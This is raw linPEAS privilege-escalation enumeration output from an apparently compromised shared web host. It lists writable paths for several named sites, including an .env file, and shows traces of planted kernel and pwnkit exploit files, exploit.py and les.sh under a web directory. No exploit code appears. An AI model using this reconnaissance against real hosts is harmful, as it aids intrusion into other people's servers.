/home2/webapps1/.cache/pip/http-v2/d/4/8/7/9 /home2/webapps1/.cache/pip/http-v2/d/4/8/7/9/d4879d4acf7a4b1efec189bef855e026429ca0273986707780498f63 /home2/webapps1/.cache/pip/http-v2/d/4/8/7/9/d4879d4acf7a4b1efec189bef855e026429ca0273986707780498f63.body /home2/webapps1/.cache/pip/http-v2/d/b /home2/webapps1/.cache/pip/http-v2/d/b/8 /home2/webapps1/.cache/pip/http-v2/d/b/8/2 /home2/webapps1/.cache/pip/http-v2/d/b/8/2/4 /home2/webapps1/.cache/pip/http-v2/d/b/8/2/4/db824c526d765b86c60e3a8f549e4d9f6b2c1e8876b000670174e0bc /home2/webapps1/.cache/pip/http-v2/d/b/8/2/4/db824c526d765b86c60e3a8f549e4d9f6b2c1e8876b000670174e0bc.body /home2/webapps1/.cache/pip/http-v2/d/e /home2/webapps1/.cache/pip/http-v2/d/e/4 /home2/webapps1/.cache/pip/http-v2/d/e/4/3 /home2/webapps1/.cache/pip/http-v2/d/e/4/3/7 /home2/webapps1/.cache/pip/http-v2/d/e/4/3/7/de437938ef85929246af957191da12fbc37876e8e6bf1a090f59e1d8 /home2/webapps1/.cache/pip/http-v2/d/e/4/3/7/de437938ef85929246af957191da12fbc37876e8e6bf1a090f59e1d8.body /home2/webapps1/.cache/pip/http-v2/e /home2/webapps1/.cache/pip/http-v2/e/7 /home2/webapps1/.cache/pip/http-v2/e/7/7 /home2/webapps1/.cache/pip/http-v2/e/7/7/2 /home2/webapps1/.cache/pip/http-v2/e/7/7/2/7 /home2/webapps1/.cache/pip/http-v2/e/7/7/2/7/e77278f0f3ea3a5e8dff059a8dc04026908741cd3d6952639498e6ae /home2/webapps1/.cache/pip/http-v2/e/7/7/2/7/e77278f0f3ea3a5e8dff059a8dc04026908741cd3d6952639498e6ae.body /home2/webapps1/.cache/pip/http-v2/e/a /home2/webapps1/.cache/pip/http-v2/e/a/5 /home2/webapps1/.cache/pip/http-v2/e/a/5/c /home2/webapps1/.cache/pip/http-v2/e/a/5/c/5 /home2/webapps1/.cache/pip/http-v2/e/a/5/c/5/ea5c56676b3de04f752730bc2b3f41d07b78eec54d525aea73fb2829 ╔══════════╣ Interesting GROUP writable files (not in Home) (max 200) ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files grep: write error: Broken pipe Group webapps1: /run/screen /var/spool/cron/webapps1 /var/php/apm/db /var/cache/php-eaccelerator /tmp/pwnkit /tmp/pwnkit/pwn.so /tmp/pwnkit/gconv-modules /tmp/.crontab.lock /tmp/all.txt /tmp/linpeas.sh /tmp/GCONV_PATH=. /tmp/GCONV_PATH=./pwnkit /home2/webapps1/ap.neowep.com/public/uploads/temp /home2/webapps1/ap.neowep.com/public/uploads/temp/ttfontdata /home2/webapps1/familytree/eurobank.webappsdigital.com/bootstrap/cache /home2/webapps1/familytree/eurobank.webappsdigital.com/.env /home2/webapps1/familytree/eurobank.webappsdigital.com/storage/framework /home2/webapps1/familytree/eurobank.webappsdigital.com/storage/app /home2/webapps1/familytree/eurobank.webappsdigital.com/storage/logs /home2/webapps1/task.neowep.in/.well-known /home2/webapps1/task.neowep.in/main_file/bootstrap/cache /home2/webapps1/task.neowep.in/main_file/public /home2/webapps1/task.neowep.in/main_file/resources/lang /home2/webapps1/task.neowep.in/main_file/storage /home2/webapps1/task.neowep.in/main_file/storage/framework /home2/webapps1/task.neowep.in/main_file/storage/logs /home2/webapps1/hrmsaas.webappsdigital.com/bootstrap/cache /home2/webapps1/hrmsaas.webappsdigital.com/public/temp /home2/webapps1/hrmsaas.webappsdigital.com/public/uploads /home2/webapps1/hrmsaas.webappsdigital.com/storage/framework /home2/webapps1/hrmsaas.webappsdigital.com/storage/app /home2/webapps1/hrmsaas.webappsdigital.com/storage/logs /home2/webapps1/sgacbseschool.com/application/config/autoload.php /home2/webapps1/smee.neowep.com/public/uploads/temp /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf/ttfontdata /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf/ttfontdata/dejavuserifcondensedB.gid.dat /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf/ttfontdata/dejavuserifcondensed.cw127.json /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf/ttfontdata/dejavuserifcondensedB.mtx.json /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf/ttfontdata/dejavuserifcondensed.cw.dat /home2/webapps1/smee.neowep.com/public/uploads/temp/mpdf/ttfontdata/dejavuserifcondensed.gid.dat #)You_can_write_even_more_files_inside_last_directory  /home2/webapps1/neoloan.webappsdigital.com/.gitignore /home2/webapps1/neoloan.webappsdigital.com/themes /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/.gitignore /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/package-lock.json /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/assets /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/assets/img /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/assets/js /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/assets/js/custom.js /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/assets/css /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/assets/css/custom.css /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/webpack.mix.js /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/js /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/js/app.js /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/package.json /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/theme.json /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/layouts /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/layouts/auth.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/layouts/master.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/menu /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/menu/admin.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/menu/client.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/menu/index.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/partials /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/partials/top_nav.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/partials/flash /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/partials/flash/message.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/partials/flash/modal.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/views/partials/footer.blade.php /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/sass /home2/webapps1/neoloan.webappsdigital.com/themes/adminlte/sass/app.scss /home2/webapps1/neoloan.webappsdigital.com/package-lock.json /home2/webapps1/neoloan.webappsdigital.com/readme.md /home2/webapps1/neoloan.webappsdigital.com/tests /home2/webapps1/neoloan.webappsdigital.com/tests/ExampleTest.php /home2/webapps1/neoloan.webappsdigital.com/tests/TestCase.php /home2/webapps1/neoloan.webappsdigital.com/documentation /home2/webapps1/neoloan.webappsdigital.com/documentation/readme.txt /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/js/jquery.js /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/js/jquery.scrollTo.js /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/js/script.js /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/js/google-code-prettify/prettify.js /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/js/google-code-prettify/prettify.css /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/js/jquery.easing.js /home2/webapps1/neoloan.webappsdigital.com/documentation/assets/css/documenter_style.css /home2/webapps1/neoloan.webappsdigital.com/documentation/index.html /home2/webapps1/neoloan.webappsdigital.com/readme.txt /home2/webapps1/neoloan.webappsdigital.com/artisan /home2/webapps1/neoloan.webappsdigital.com/Modules /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Flutterwave.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/Seeders /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/Seeders/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/Seeders/FlutterwaveDatabaseSeeder.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/Migrations /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/Migrations/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/factories /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Database/factories/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Library /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Library/Preauth.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Library/Transactions.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Library/AccountPayment.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Library/Bill.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Library/CardPayment.php #)You_can_write_even_more_files_inside_last_directory  /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/webpack.mix.js /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Tests /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Tests/Unit /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Tests/Unit/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Tests/Feature /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Tests/Feature/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Routes /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Routes/api.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Routes/web.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/package.json /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Providers /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Providers/FlutterwaveServiceProvider.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Providers/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Providers/RouteServiceProvider.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/module.json /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Requests /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Requests/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Controllers /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Controllers/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Controllers/FlutterwaveController.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Middleware /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Http/Middleware/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Entities /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Entities/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/composer.json /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Config /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Config/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Config/config.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Console /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Console/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets/js /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets/js/app.js /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets/sass /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets/sass/app.scss /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/assets/images /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/views /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/views/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/views/layouts /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/views/layouts/master.blade.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/views/index.blade.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/lang /home2/webapps1/neoloan.webappsdigital.com/Modules/Flutterwave/Resources/lang/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Seeders /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Seeders/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Seeders/ShareChargeOptionsTableSeeder.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Seeders/ShareTransactionTypesTableSeeder.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Seeders/ShareDatabaseSeeder.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Seeders/ShareChargeTypesTableSeeder.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Migrations /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Migrations/2020_09_10_171959_create_share_products_table.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Migrations/2020_09_10_171940_create_share_charge_types_table.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Migrations/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Migrations/2020_09_10_172054_create_shares_table.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/Migrations/2020_09_10_172033_create_share_product_linked_charges_table.php #)You_can_write_even_more_files_inside_last_directory  /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/factories /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Database/factories/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/webpack.mix.js /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Tests /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Tests/Unit /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Tests/Unit/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Tests/Feature /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Tests/Feature/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Routes /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Routes/api.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Routes/web.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/package.json /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Providers /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Providers/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Providers/ShareServiceProvider.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Providers/RouteServiceProvider.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/module.json /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Requests /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Requests/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Controllers /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Controllers/ShareController.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Controllers/ShareChargeController.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Controllers/.gitkeep /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Controllers/ShareProductController.php /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Middleware /home2/webapps1/neoloan.webappsdigital.com/Modules/Share/Http/Middleware/.gitkeep  ╔═════════════════════════╗ ════════════════════════════╣ Other Interesting Files ╠════════════════════════════  ╚═════════════════════════╝ ╔══════════╣ .sh files in path ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/.conda-anaconda-tos-pre-unlink.sh You own the script: /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext.sh /usr/share/Modules/bin/createmodule.sh /usr/bin/lesspipe.sh ╔══════════╣ Executable files potentially added by user (limit 70) 2025-12-23+17:17:39.1955947850 /usr/local/lsws/admin/misc/ap_lsws.sh 2025-12-23+16:53:14.8203118680 /var/softaculous/wp_plugins/soft_wp_plugins.zip 2025-12-23+12:14:47.0140268330 /home2/webapps1/se.ishaneowep.com/assets/data/outgoing/backup.sql 2025-12-23+11:07:52.8877452070 /home2/webapps1/.cagefs/tmp/GCONV_PATH=./pwnkit 2025-12-23+10:52:50.2433632840 /home2/webapps1/amc.ishaneowep.com/admin/logo/pwnkit/gconv-modules 2025-12-23+10:52:50.2433632840 /home2/webapps1/amc.ishaneowep.com/admin/logo/GCONV_PATH=./pwnkit 2025-12-23+10:50:49.4712449950 /home2/webapps1/amc.ishaneowep.com/admin/logo/exploit.py 2025-12-23+10:19:41.1069044090 /home2/webapps1/amc.ishaneowep.com/admin/logo/run_bot.sh 2025-12-23+10:03:02.0091950820 /home2/webapps1/amc.ishaneowep.com/admin/logo/les.sh 2025-12-23+00:58:43.0442824050 /home2/webapps1/amc.ishaneowep.com/admin/logo/CVE-2024-1086/include/linux-lts-6.1.72/headers_check.pl 2025-12-22+22:21:19.5687364530 /home2/webapps1/amc.ishaneowep.com/admin/logo/speedtest.py 2025-12-22+22:18:36.9338970070 /home2/webapps1/.local/bin/speedtest-cli 2025-12-22+22:18:36.9338970070 /home2/webapps1/.local/bin/speedtest 2025-12-22+22:00:17.6747985910 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/pip3 2025-12-22+22:00:17.6747985910 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/pip 2025-12-22+22:00:17.6747985910 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/archspec 2025-12-22+22:00:17.6577987100 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/condabin/conda 2025-12-22+22:00:17.6577987100 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/deactivate 2025-12-22+22:00:17.6547987310 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/conda-env 2025-12-22+22:00:17.6547987310 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/conda 2025-12-22+22:00:17.6517987530 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/activate 2025-12-22+22:00:17.6077990620 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/cph 2025-12-22+22:00:17.6067990690 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/conda-token 2025-12-22+22:00:17.6027990980 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/anaconda 2025-12-22+22:00:17.6007991120 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/typer 2025-12-22+22:00:17.5977991320 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/keyring 2025-12-22+22:00:17.5817992450 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/conda-content-trust 2025-12-22+22:00:17.5707993230 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/dotenv 2025-12-22+22:00:17.5577994140 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/markdown-it 2025-12-22+22:00:17.5557994280 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/jsonpatch 2025-12-22+22:00:17.5557994280 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/jsondiff 2025-12-22+22:00:17.5527994490 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/wheel 2025-12-22+22:00:17.5497994700 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/tqdm 2025-12-22+22:00:17.5297996110 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/pysemver 2025-12-22+22:00:17.4508001670 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/pygmentize 2025-12-22+22:00:17.4438002170 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/jsonpointer 2025-12-22+22:00:17.4408002380 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/distro 2025-12-22+22:00:17.4388002520 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/normalizer 2025-12-22+22:00:17.4328002940 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/menuinst 2025-12-22+22:00:17.4308003080 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/libcurl.so.4.8.0 2025-12-22+22:00:17.1048026020 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/curl-config 2025-12-22+22:00:16.8868041370 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/libpython3.13.so.1.0 2025-12-22+21:59:44.3840329010 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/pydoc3.13 2025-12-22+21:59:44.3840329010 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/idle3.13 2025-12-22+21:59:44.3140333930 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/libtcl8.6.so 2025-12-22+21:59:43.5960384460 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/libgettextsrc-0.21.so 2025-12-22+21:59:43.4770392840 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/libgettextlib-0.21.so 2025-12-22+21:59:43.1750414090 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/gettext/user-email 2025-12-22+21:59:43.1700414450 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/gettext/urlget 2025-12-22+21:59:43.1630414940 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/gettext/hostname 2025-12-22+21:59:43.1560415430 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/lib/gettext/cldr-plurals 2025-12-22+21:59:43.1490415920 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/xgettext 2025-12-22+21:59:43.0370423810 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/recode-sr-latin 2025-12-22+21:59:43.0300424300 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/ngettext 2025-12-22+21:59:43.0170425210 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msguniq 2025-12-22+21:59:43.0080425850 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgunfmt 2025-12-22+21:59:42.9950426770 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgmerge 2025-12-22+21:59:42.9750428170 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msginit 2025-12-22+21:59:42.9540429650 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msggrep 2025-12-22+21:59:42.9130432540 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgfmt 2025-12-22+21:59:42.8810434790 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgfilter 2025-12-22+21:59:42.8700435560 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgexec 2025-12-22+21:59:42.8600436270 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgen 2025-12-22+21:59:42.8510436900 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgconv 2025-12-22+21:59:42.8410437600 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgcomm 2025-12-22+21:59:42.8320438240 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgcmp 2025-12-22+21:59:42.8220438940 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgcat 2025-12-22+21:59:42.8130439570 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/msgattrib 2025-12-22+21:59:42.8020440350 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettextize 2025-12-22+21:59:42.7880441330 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/gettext sort: write failed: 'standard output': Broken pipe sort: write error ╔══════════╣ Unexpected in /opt (usually empty) total 60 drwxr-xr-x. 15 root root 4096 Feb 8 2025 . drwxr-xr-x 18 root root 4096 Nov 26 2024 .. drwxr-xr-x. 2 root root 4096 Sep 19 2024 ai-bolit drwxr-xr-x. 62 root root 4096 Apr 3 2025 alt drwxr-xr-x. 2 root root 4096 Sep 18 2024 app-version-detector drwxr-xr-x. 14 root root 4096 Apr 3 2025 cloudlinux drwxr-xr-x 2 root root 4096 Sep 19 2024 cloudlinux-linksafe drwxr-xr-x 2 root root 4096 Apr 3 2025 cloudlinux-site-optimization-module drwxr-xr-x 3 root root 4096 Aug 11 21:24 clwpos drwxr-xr-x. 32 root root 4096 Dec 9 05:35 cpanel drwxr-xr-x 9 cpguard 